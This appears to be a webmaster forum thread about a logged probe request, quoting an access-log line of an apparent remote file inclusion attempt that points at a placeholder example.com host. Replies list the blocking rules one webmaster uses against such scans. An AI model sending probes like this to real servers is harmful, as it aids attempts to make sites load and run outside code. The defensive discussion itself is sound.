Welcome to WebmasterWorld Guest from 220.127.116.11
77.221.x.x - - [12/Jul/2009:13:44:09 -0700] GET /.scanhttp://aneh.example.com/id.txt?%0D? HTTP/1.1" 403 137 "-" "libwww-perl/5.805"
[edited by: jdMorgan at 1:39 am (utc) on July 14, 2009]
[edit reason] example.com for members' safety. [/edit]
Personally, I don't know what these guys are up to, but I block any request that has "http" in the requested URL-path or query string, and I block libwww-perl with only a few exceptions.
Too many exploiters, so little time: I say 403 and be done with it...
BTW: Half of the XSS injection probes coming from the USSR have the user agent "Mozilla/5.0" - which I also block. I have not seen one legitimate browser that goes by that exact user agent.